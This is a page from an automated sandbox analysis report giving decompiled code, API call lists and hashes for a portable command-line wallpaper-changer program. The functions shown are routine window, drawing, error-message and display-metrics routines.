                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                  • String ID: DISPLAY$GetMonitorInfoA$\VB
                                  • API String ID: 2545840971-2925803095
                                  • Opcode ID: 656fae020c2a21d011a6f8da84178655c790ed1f5ddaed347ee99df01d2165cd
                                  • Instruction ID: 85d5499ff39a5f1ee681518f8bcf01a75c21e5a03b702590deb2336c3e20234a
                                  • Opcode Fuzzy Hash: 656fae020c2a21d011a6f8da84178655c790ed1f5ddaed347ee99df01d2165cd
                                  • Instruction Fuzzy Hash: A31106B1742B24DFE3208F60AC447A7B7E8EB45310F41443AED0997241E3B4A940CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00425730, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 68stringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 47%
                                  			E00425730(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x470932 != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *((intOrPtr*)(_t29 + 8)) = 0;
						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L0040632C();
						}
						_t24 = 1;
					}
				} else {
					_t26 =  *0x47091c; // 0x425730
					 *0x47091c = E0042525C(6, _t23, _t26, _t27, _t29);
					_t24 =  *0x47091c(_t27, _t29);
				}
				return _t24;
			}














                                  0x00425739
                                  0x0042573c
                                  0x00425746
                                  0x0042576b
                                  0x00425773
                                  0x00425793
                                  0x00425798
                                  0x004257a3
                                  0x004257ae
                                  0x004257b8
                                  0x004257b9
                                  0x004257ba
                                  0x004257bb
                                  0x004257bc
                                  0x004257bd
                                  0x004257c7
                                  0x004257c9
                                  0x004257d1
                                  0x004257d2
                                  0x004257d2
                                  0x004257d7
                                  0x004257d7
                                  0x00425748
                                  0x0042574d
                                  0x0042575a
                                  0x00425767
                                  0x00425767
                                  0x004257e1

                                  APIs
                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00425788
                                  • GetSystemMetrics.USER32 ref: 0042579D
                                  • GetSystemMetrics.USER32 ref: 004257A8
                                  • lstrcpy.KERNEL32(?,DISPLAY), ref: 004257D2
                                    • Part of subcall function 0042525C: GetProcAddress.KERNEL32(745C0000,00000000), ref: 004252DB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                  • String ID: 0WB$DISPLAY$GetMonitorInfoW
                                  • API String ID: 2545840971-636725853
                                  • Opcode ID: f3f387546b912440cb4908e1d9a688bd911ab3307b41073c9ae760e7094c4cab
                                  • Instruction ID: 04a0e49424eaff6356578b99823698d8527addfaa4e729d3004db5b68380df5b
                                  • Opcode Fuzzy Hash: f3f387546b912440cb4908e1d9a688bd911ab3307b41073c9ae760e7094c4cab
                                  • Instruction Fuzzy Hash: A711E4F1742B24DFD3208F61AC447A7B7E8EB85310F50452BED4AD7641D3B4A840CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403F9C, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 79%
                                  			E00403F9C(void* __ecx) {
				long _v4;
				int _t3;

				if( *0x470048 == 0) {
					if( *0x46e030 == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x47021c == 0xd7b2 &&  *0x470224 > 0) {
						 *0x470234();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), E00404024, 2,  &_v4, 0);
				}
			}





                                  0x00403fa4
                                  0x00404004
                                  0x00404014
                                  0x00404014
                                  0x0040401a
                                  0x00403fa6
                                  0x00403faf
                                  0x00403fbf
                                  0x00403fbf
                                  0x00403fdb
                                  0x00403ffc
                                  0x00403ffc

                                  APIs
                                  • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,0046D564,00000000,?,00404063,?,?,?,00000002,0040410E,004027F3,0040283A,Philipp Winterberg's Command Line Wallpaper Changer Portable 1.00 [www.p78.de],00000000), ref: 00403FD5
                                  • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,0046D564,00000000,?,00404063,?,?,?,00000002,0040410E,004027F3,0040283A,Philipp Winterberg's Command Line Wallpaper Changer Portable 1.00 [www.p78.de]), ref: 00403FDB
                                  • GetStdHandle.KERNEL32(000000F5,00404024,00000002,0046D564,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0046D564,00000000,?,00404063), ref: 00403FF0
                                  • WriteFile.KERNEL32(00000000,000000F5,00404024,00000002,0046D564,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0046D564,00000000,?,00404063), ref: 00403FF6
                                  • MessageBoxA.USER32 ref: 00404014
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: FileHandleWrite$Message
                                  • String ID: Error$Runtime error at 00000000
                                  • API String ID: 1570097196-2970929446
                                  • Opcode ID: f80266a4a0125b5ab7f5594911a45bd2333c4430a51f24f690d4baf8da366ab4
                                  • Instruction ID: e79a70fa97476f266a8304fc92940b86bc24cb5a9e47c817e36800edcefb2032
                                  • Opcode Fuzzy Hash: f80266a4a0125b5ab7f5594911a45bd2333c4430a51f24f690d4baf8da366ab4
                                  • Instruction Fuzzy Hash: BCF0F6A5691341B4EA20B7915D0AF8A269C4784F19F20457FB318B80E3D7FC08C0966F
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00442B3C, Relevance: 12.2, APIs: 8, Instructions: 170COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 39%
                                  			E00442B3C(void* __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v28;
				char _v44;
				void* __edi;
				void* __ebp;
				void* _t46;
				void* _t57;
				intOrPtr _t85;
				intOrPtr _t96;
				void* _t117;
				void* _t118;
				void* _t127;
				struct HDC__* _t136;
				struct HDC__* _t137;
				intOrPtr* _t138;
				void* _t139;

				_t119 = __ecx;
				_t135 = __ecx;
				_v8 = __edx;
				_t118 = __eax;
				_t46 = E004426DC(__eax);
				if(_t46 != 0) {
					_t142 = _a4;
					if(_a4 == 0) {
						__eflags =  *((intOrPtr*)(_t118 + 0x54));
						if( *((intOrPtr*)(_t118 + 0x54)) == 0) {
							_t138 = E004227C4(1);
							 *((intOrPtr*)(_t118 + 0x54)) = _t138;
							E00423CDC(_t138, 1);
							 *((intOrPtr*)( *_t138 + 0x40))();
							_t119 =  *_t138;
							 *((intOrPtr*)( *_t138 + 0x34))();
						}
						E0041DE78( *((intOrPtr*)(E00422D98( *((intOrPtr*)(_t118 + 0x54))) + 0x14)), _t119, 0xffffff, _t135, _t139, __eflags);
						E004128F0(0,  *((intOrPtr*)(_t118 + 0x34)), 0,  &_v44,  *((intOrPtr*)(_t118 + 0x30)));
						_push( &_v44);
						_t57 = E00422D98( *((intOrPtr*)(_t118 + 0x54)));
						_pop(_t127);
						E0041E4E0(_t57, _t127);
						_push(0);
						_push(0);
						_push(0xffffffff);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(E0041E8D0(E00422D98( *((intOrPtr*)(_t118 + 0x54)))));
						_push(_v8);
						_push(E00442818(_t118));
						L004251C4();
						E004128F0(_a16, _a16 +  *((intOrPtr*)(_t118 + 0x34)), _a12,  &_v28, _a12 +  *((intOrPtr*)(_t118 + 0x30)));
						_v12 = E0041E8D0(E00422D98( *((intOrPtr*)(_t118 + 0x54))));
						E0041DE78( *((intOrPtr*)(_t135 + 0x14)), _a16 +  *((intOrPtr*)(_t118 + 0x34)), 0xff000014, _t135, _t139, __eflags);
						_t136 = E0041E8D0(_t135);
						SetTextColor(_t136, 0xffffff);
						SetBkColor(_t136, 0);
						_push(0xe20746);
						_push(0);
						_push(0);
						_push(_v12);
						_push( *((intOrPtr*)(_t118 + 0x30)));
						_push( *((intOrPtr*)(_t118 + 0x34)));
						_push(_a12 + 1);
						_t85 = _a16 + 1;
						__eflags = _t85;
						_push(_t85);
						_push(_t136);
						L0040634C();
						E0041DE78( *((intOrPtr*)(_t135 + 0x14)), _a16 +  *((intOrPtr*)(_t118 + 0x34)), 0xff000010, _t135, _t139, _t85);
						_t137 = E0041E8D0(_t135);
						SetTextColor(_t137, 0xffffff);
						SetBkColor(_t137, 0);
						_push(0xe20746);
						_push(0);
						_push(0);
						_push(_v12);
						_push( *((intOrPtr*)(_t118 + 0x30)));
						_push( *((intOrPtr*)(_t118 + 0x34)));
						_push(_a12);
						_t96 = _a16;
						_push(_t96);
						_push(_t137);
						L0040634C();
						return _t96;
					}
					_push(_a8);
					_push(E0044252C(_t142));
					E00442B14(_t118, _t142);
					_push(E0044252C(_t142));
					_push(0);
					_push(0);
					_push(_a12);
					_push(_a16);
					_push(E0041E8D0(__ecx));
					_push(_v8);
					_t117 = E00442818(_t118);
					_push(_t117);
					L004251C4();
					return _t117;
				}
				return _t46;
			}




















                                  0x00442b3c
                                  0x00442b45
                                  0x00442b47
                                  0x00442b4a
                                  0x00442b4e
                                  0x00442b55
                                  0x00442b5b
                                  0x00442b5f
                                  0x00442ba5
                                  0x00442ba9
                                  0x00442bb7
                                  0x00442bb9
                                  0x00442bc0
                                  0x00442bcc
                                  0x00442bd4
                                  0x00442bd6
                                  0x00442bd6
                                  0x00442be9
                                  0x00442bfd
                                  0x00442c05
                                  0x00442c09
                                  0x00442c0e
                                  0x00442c0f
                                  0x00442c14
                                  0x00442c16
                                  0x00442c18
                                  0x00442c1a
                                  0x00442c1c
                                  0x00442c1e
                                  0x00442c20
                                  0x00442c2f
                                  0x00442c33
                                  0x00442c3b
                                  0x00442c3c
                                  0x00442c58
                                  0x00442c6a
                                  0x00442c75
                                  0x00442c81
                                  0x00442c89
                                  0x00442c91
                                  0x00442c96
                                  0x00442c9b
                                  0x00442c9d
                                  0x00442ca2
                                  0x00442ca6
                                  0x00442caa
                                  0x00442caf
                                  0x00442cb3
                                  0x00442cb3
                                  0x00442cb4
                                  0x00442cb5
                                  0x00442cb6
                                  0x00442cc3
                                  0x00442ccf
                                  0x00442cd7
                                  0x00442cdf
                                  0x00442ce4
                                  0x00442ce9
                                  0x00442ceb
                                  0x00442cf0
                                  0x00442cf4
                                  0x00442cf8
                                  0x00442cfc
                                  0x00442cfd
                                  0x00442d00
                                  0x00442d01
                                  0x00442d02
                                  0x00000000
                                  0x00442d02
                                  0x00442b64
                                  0x00442b6d
                                  0x00442b70
                                  0x00442b7a
                                  0x00442b7b
                                  0x00442b7d
                                  0x00442b82
                                  0x00442b86
                                  0x00442b8e
                                  0x00442b92
                                  0x00442b95
                                  0x00442b9a
                                  0x00442b9b
                                  0x00000000
                                  0x00442b9b
                                  0x00442d0d

                                  APIs
                                  • 73452430.COMCTL32(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 00442B9B
                                  • 73452430.COMCTL32(00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00442C3C
                                  • SetTextColor.GDI32(00000000,00FFFFFF), ref: 00442C89
                                  • SetBkColor.GDI32(00000000,00000000), ref: 00442C91
                                  • 72E897E0.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746,00000000,00000000,00000000,00FFFFFF,00000000,?,00000000), ref: 00442CB6
                                    • Part of subcall function 00442B14: 73452240.COMCTL32(00000000,?,00442B75,00000000,?), ref: 00442B2A
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: 73452430Color$73452240E897Text
                                  • String ID:
                                  • API String ID: 3108427945-0
                                  • Opcode ID: 10dd69f64e80607ac2ee04575a3e1d48c79a5e72a682df9485adc5b6e2fcec11
                                  • Instruction ID: 7ca1424d28030676fb932b78274d869677d32c1fd538b1d615fa8c2f8909bf18
                                  • Opcode Fuzzy Hash: 10dd69f64e80607ac2ee04575a3e1d48c79a5e72a682df9485adc5b6e2fcec11
                                  • Instruction Fuzzy Hash: BD512C717002146FDB50FF69DDC2F9E37ADAF08704F50016AB904EB286CA78EC418B69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004529F8, Relevance: 12.1, APIs: 8, Instructions: 149windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 72%
                                  			E004529F8(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v22;
				intOrPtr _v28;
				struct HWND__* _v32;
				char _v36;
				intOrPtr _t53;
				intOrPtr _t59;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t72;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t86;
				intOrPtr _t89;
				void* _t94;
				intOrPtr _t128;
				void* _t130;
				void* _t133;
				void* _t134;
				intOrPtr _t135;

				_t131 = __esi;
				_t130 = __edi;
				_t111 = __ebx;
				_t133 = _t134;
				_t135 = _t134 + 0xffffffe0;
				_push(__ebx);
				_push(__esi);
				_v36 = 0;
				_v8 = __eax;
				_push(_t133);
				_push(0x452cd4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t135;
				E00433300();
				if( *((char*)(_v8 + 0x57)) != 0 ||  *((intOrPtr*)( *_v8 + 0x50))() == 0 || ( *(_v8 + 0x328) & 0x00000008) != 0 ||  *((char*)(_v8 + 0x247)) == 1) {
					_t53 =  *0x46fb90; // 0x41b650
					E00405C70(_t53,  &_v36);
					E0040B830(_v36, 1);
					E00403B64();
				}
				if(GetCapture() != 0) {
					SendMessageA(GetCapture(), 0x1f, 0, 0);
				}
				ReleaseCapture();
				_t59 =  *0x470b40; // 0x0
				E004550EC(_t59);
				_push(_t133);
				_push(0x452cb7);
				_push( *[fs:edx]);
				 *[fs:edx] = _t135;
				 *(_v8 + 0x328) =  *(_v8 + 0x328) | 0x00000008;
				if( *((char*)(_v8 + 0x300)) == 0) {
					E00438B2C(_v8);
				}
				_v32 = GetActiveWindow();
				_v20 = E0044C420();
				_t65 =  *0x470b44; // 0x0
				_t66 =  *0x470b44; // 0x0
				E00413DA8( *((intOrPtr*)(_t66 + 0x7c)),  *((intOrPtr*)(_t65 + 0x78)), 0);
				_t69 =  *0x470b44; // 0x0
				 *((intOrPtr*)(_t69 + 0x78)) = _v8;
				_t70 =  *0x470b44; // 0x0
				_v22 =  *(_t70 + 0x44) & 0x0000ffff;
				_t72 =  *0x470b44; // 0x0
				E00453FAC(_t72, 0);
				_t74 =  *0x470b44; // 0x0
				_v28 =  *((intOrPtr*)(_t74 + 0x48));
				_v16 = E0044C504(0, _t111, _t130, _t131);
				_push(_t133);
				_push(0x452c95);
				_push( *[fs:edx]);
				 *[fs:edx] = _t135;
				E00452918(_v8);
				_push(_t133);
				_push(0x452bf4);
				_push( *[fs:edx]);
				 *[fs:edx] = _t135;
				SendMessageA(E0043BA58(_v8), 0xb000, 0, 0);
				 *((intOrPtr*)(_v8 + 0x264)) = 0;
				do {
					_t84 =  *0x470b40; // 0x0
					E00456250(_t84);
					_t86 =  *0x470b40; // 0x0
					if( *((char*)(_t86 + 0xa4)) == 0) {
						if( *((intOrPtr*)(_v8 + 0x264)) != 0) {
							E00452878(_v8);
						}
					} else {
						 *((intOrPtr*)(_v8 + 0x264)) = 2;
					}
					_t89 =  *((intOrPtr*)(_v8 + 0x264));
				} while (_t89 == 0);
				_v12 = _t89;
				SendMessageA(E0043BA58(_v8), 0xb001, 0, 0);
				_t94 = E0043BA58(_v8);
				if(_t94 != GetActiveWindow()) {
					_v32 = 0;
				}
				_pop(_t128);
				 *[fs:eax] = _t128;
				_push(0x452bfb);
				return E00452910();
			}




























                                  0x004529f8
                                  0x004529f8
                                  0x004529f8
                                  0x004529f9
                                  0x004529fb
                                  0x004529fe
                                  0x004529ff
                                  0x00452a02
                                  0x00452a05
                                  0x00452a0a
                                  0x00452a0b
                                  0x00452a10
                                  0x00452a13
                                  0x00452a16
                                  0x00452a22
                                  0x00452a4b
                                  0x00452a50
                                  0x00452a5f
                                  0x00452a64
                                  0x00452a64
                                  0x00452a70
                                  0x00452a7e
                                  0x00452a7e
                                  0x00452a83
                                  0x00452a88
                                  0x00452a8d
                                  0x00452a94
                                  0x00452a95
                                  0x00452a9a
                                  0x00452a9d
                                  0x00452aa3
                                  0x00452ab4
                                  0x00452ab9
                                  0x00452ab9
                                  0x00452ac3
                                  0x00452acb
                                  0x00452ace
                                  0x00452ad6
                                  0x00452ae0
                                  0x00452ae5
                                  0x00452aed
                                  0x00452af0
                                  0x00452af9
                                  0x00452aff
                                  0x00452b04
                                  0x00452b09
                                  0x00452b11
                                  0x00452b1b
                                  0x00452b20
                                  0x00452b21
                                  0x00452b26
                                  0x00452b29
                                  0x00452b2f
                                  0x00452b36
                                  0x00452b37
                                  0x00452b3c
                                  0x00452b3f
                                  0x00452b54
                                  0x00452b5e
                                  0x00452b64
                                  0x00452b64
                                  0x00452b69
                                  0x00452b6e
                                  0x00452b7a
                                  0x00452b95
                                  0x00452b9a
                                  0x00452b9a
                                  0x00452b7c
                                  0x00452b7f
                                  0x00452b7f
                                  0x00452ba2
                                  0x00452ba8
                                  0x00452bac
                                  0x00452bc1
                                  0x00452bc9
                                  0x00452bd7
                                  0x00452bdb
                                  0x00452bdb
                                  0x00452be0
                                  0x00452be3
                                  0x00452be6
                                  0x00452bf3

                                  APIs
                                  • GetCapture.USER32 ref: 00452A69
                                  • GetCapture.USER32 ref: 00452A78
                                  • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00452A7E
                                  • ReleaseCapture.USER32(00000000,00452CD4), ref: 00452A83
                                  • GetActiveWindow.USER32 ref: 00452ABE
                                  • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00452B54
                                  • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00452BC1
                                  • GetActiveWindow.USER32 ref: 00452BD0
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CaptureMessageSend$ActiveWindow$Release
                                  • String ID:
                                  • API String ID: 862346643-0
                                  • Opcode ID: bd06df2e6e4641156485db2c418efb0c5c70bda512e5c23815d709e4b85c3a64
                                  • Instruction ID: 7f8cd45a891df606a1edda72d1237cfc15d2167e0b35d7f03fb014637ca14bab
                                  • Opcode Fuzzy Hash: bd06df2e6e4641156485db2c418efb0c5c70bda512e5c23815d709e4b85c3a64
                                  • Instruction Fuzzy Hash: 17516E70A00604DFDB10EF65CA46B5DB7F5EB45708F1540BAF904AB2A3C779AE44CB48
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004398E8, Relevance: 12.1, APIs: 8, Instructions: 136COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 86%
                                  			E004398E8(intOrPtr __eax, void* __ebx, void* __ecx, struct HDC__* __edx, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				struct HDC__* _v12;
				int _v16;
				struct tagRECT _v32;
				signed int _t68;
				intOrPtr _t74;
				intOrPtr _t81;
				int _t102;
				void* _t104;
				void* _t105;
				intOrPtr _t119;
				int _t125;
				void* _t126;
				void* _t129;

				_v12 = __edx;
				_v8 = __eax;
				 *(_v8 + 0x54) =  *(_v8 + 0x54) | 0x00000080;
				_v16 = SaveDC(_v12);
				_push(_t129);
				_push(0x439a60);
				_push( *[fs:edx]);
				 *[fs:edx] = _t129 + 0xffffffe4;
				E004333E0(_v12, _a4, __ecx);
				IntersectClipRect(_v12, 0, 0,  *(_v8 + 0x48),  *(_v8 + 0x4c));
				_t102 = 0;
				_t125 = 0;
				if((GetWindowLongA(E0043BA58(_v8), 0xffffffec) & 0x00000002) == 0) {
					_t68 = GetWindowLongA(E0043BA58(_v8), 0xfffffff0);
					__eflags = _t68 & 0x00800000;
					if((_t68 & 0x00800000) != 0) {
						_t125 = 3;
						_t102 = 0xa00f;
					}
				} else {
					_t125 = 0xa;
					_t102 = 0x200f;
				}
				if(_t102 != 0) {
					SetRect( &_v32, 0, 0,  *(_v8 + 0x48),  *(_v8 + 0x4c));
					DrawEdge(_v12,  &_v32, _t125, _t102);
					E004333E0(_v12, _v32.top, _v32.left);
					IntersectClipRect(_v12, 0, 0, _v32.right - _v32.left, _v32.bottom - _v32.top);
				}
				E00435DE4(_v8, _v12, 0x14, 0);
				E00435DE4(_v8, _v12, 0xf, 0);
				_t74 =  *((intOrPtr*)(_v8 + 0x1a4));
				if(_t74 == 0) {
					L12:
					_pop(_t119);
					 *[fs:eax] = _t119;
					_push(0x439a67);
					return RestoreDC(_v12, _v16);
				} else {
					_t104 =  *((intOrPtr*)(_t74 + 8)) - 1;
					if(_t104 < 0) {
						goto L12;
					}
					_t105 = _t104 + 1;
					_t126 = 0;
					do {
						_t81 = E00413D2C( *((intOrPtr*)(_v8 + 0x1a4)), _t126);
						_t138 =  *((char*)(_t81 + 0x57));
						if( *((char*)(_t81 + 0x57)) != 0) {
							E004398E8(_t81, _t105,  *((intOrPtr*)(_t81 + 0x40)), _v12, _t126, _t138,  *((intOrPtr*)(_t81 + 0x44)));
						}
						_t126 = _t126 + 1;
						_t105 = _t105 - 1;
					} while (_t105 != 0);
					goto L12;
				}
			}

















                                  0x004398f2
                                  0x004398f5
                                  0x004398fb
                                  0x0043990a
                                  0x0043990f
                                  0x00439910
                                  0x00439915
                                  0x00439918
                                  0x00439923
                                  0x0043993e
                                  0x00439943
                                  0x00439945
                                  0x0043995a
                                  0x00439973
                                  0x00439978
                                  0x0043997d
                                  0x0043997f
                                  0x00439984
                                  0x00439984
                                  0x0043995c
                                  0x0043995c
                                  0x00439961
                                  0x00439961
                                  0x0043998b
                                  0x004399a3
                                  0x004399b2
                                  0x004399c0
                                  0x004399db
                                  0x004399db
                                  0x004399ed
                                  0x004399ff
                                  0x00439a07
                                  0x00439a0f
                                  0x00439a45
                                  0x00439a47
                                  0x00439a4a
                                  0x00439a4d
                                  0x00439a5f
                                  0x00439a11
                                  0x00439a14
                                  0x00439a17
                                  0x00000000
                                  0x00000000
                                  0x00439a19
                                  0x00439a1a
                                  0x00439a1c
                                  0x00439a27
                                  0x00439a2c
                                  0x00439a30
                                  0x00439a3c
                                  0x00439a3c
                                  0x00439a41
                                  0x00439a42
                                  0x00439a42
                                  0x00000000
                                  0x00439a1c

                                  APIs
                                  • SaveDC.GDI32(?), ref: 00439905
                                    • Part of subcall function 004333E0: GetWindowOrgEx.GDI32(?), ref: 004333EE
                                    • Part of subcall function 004333E0: SetWindowOrgEx.GDI32(?,?,?,00000000), ref: 00433404
                                  • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0043993E
                                  • GetWindowLongA.USER32 ref: 00439952
                                  • GetWindowLongA.USER32 ref: 00439973
                                  • SetRect.USER32 ref: 004399A3
                                  • DrawEdge.USER32(?,?,00000000,00000000), ref: 004399B2
                                  • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 004399DB
                                  • RestoreDC.GDI32(?,?), ref: 00439A5A
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Window$Rect$ClipIntersectLong$DrawEdgeRestoreSave
                                  • String ID:
                                  • API String ID: 2976466617-0
                                  • Opcode ID: 074dd23cf7a33f5f16385952daeb72322e8332cc8c4654a74bf5d61295c337b3
                                  • Instruction ID: c6099c43392067a62c403d720c5dc63d718564cbc045319a2f27b1468a8bcaef
                                  • Opcode Fuzzy Hash: 074dd23cf7a33f5f16385952daeb72322e8332cc8c4654a74bf5d61295c337b3
                                  • Instruction Fuzzy Hash: 9D411275B00209AFDB10EBD9C985F9EB7F8EF48304F1141A9B604E7392C679AE41CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041F22C, Relevance: 12.1, APIs: 8, Instructions: 79COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 26%
                                  			E0041F22C(void* __ebx) {
				intOrPtr _v8;
				char _v1000;
				char _v1004;
				char _v1032;
				signed int _v1034;
				short _v1036;
				void* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr _t45;
				intOrPtr _t52;
				void* _t54;
				void* _t55;

				_t54 = _t55;
				_v1036 = 0x300;
				_v1034 = 0x10;
				_t25 = E00402990(_t24, 0x40,  &_v1032);
				_push(0);
				L004066E4();
				_v8 = _t25;
				_push(_t54);
				_push(0x41f329);
				_push( *[fs:eax]);
				 *[fs:eax] = _t55 + 0xfffffbf8;
				_push(0x68);
				_t27 = _v8;
				_push(_t27);
				L0040641C();
				_t45 = _t27;
				if(_t45 >= 0x10) {
					_push( &_v1032);
					_push(8);
					_push(0);
					_push(_v8);
					L0040645C();
					if(_v1004 != 0xc0c0c0) {
						_push(_t54 + (_v1034 & 0x0000ffff) * 4 - 0x424);
						_push(8);
						_push(_t45 - 8);
						_push(_v8);
						L0040645C();
					} else {
						_push( &_v1004);
						_push(1);
						_push(_t45 - 8);
						_push(_v8);
						L0040645C();
						_push(_t54 + (_v1034 & 0x0000ffff) * 4 - 0x420);
						_push(7);
						_push(_t45 - 7);
						_push(_v8);
						L0040645C();
						_push( &_v1000);
						_push(1);
						_push(7);
						_push(_v8);
						L0040645C();
					}
				}
				_pop(_t52);
				 *[fs:eax] = _t52;
				_push(0x41f330);
				_t29 = _v8;
				_push(_t29);
				_push(0);
				L00406944();
				return _t29;
			}

















                                  0x0041f22d
                                  0x0041f236
                                  0x0041f23f
                                  0x0041f253
                                  0x0041f258
                                  0x0041f25a
                                  0x0041f25f
                                  0x0041f264
                                  0x0041f265
                                  0x0041f26a
                                  0x0041f26d
                                  0x0041f270
                                  0x0041f272
                                  0x0041f275
                                  0x0041f276
                                  0x0041f27b
                                  0x0041f280
                                  0x0041f28c
                                  0x0041f28d
                                  0x0041f28f
                                  0x0041f294
                                  0x0041f295
                                  0x0041f2a4
                                  0x0041f300
                                  0x0041f301
                                  0x0041f306
                                  0x0041f30a
                                  0x0041f30b
                                  0x0041f2a6
                                  0x0041f2ac
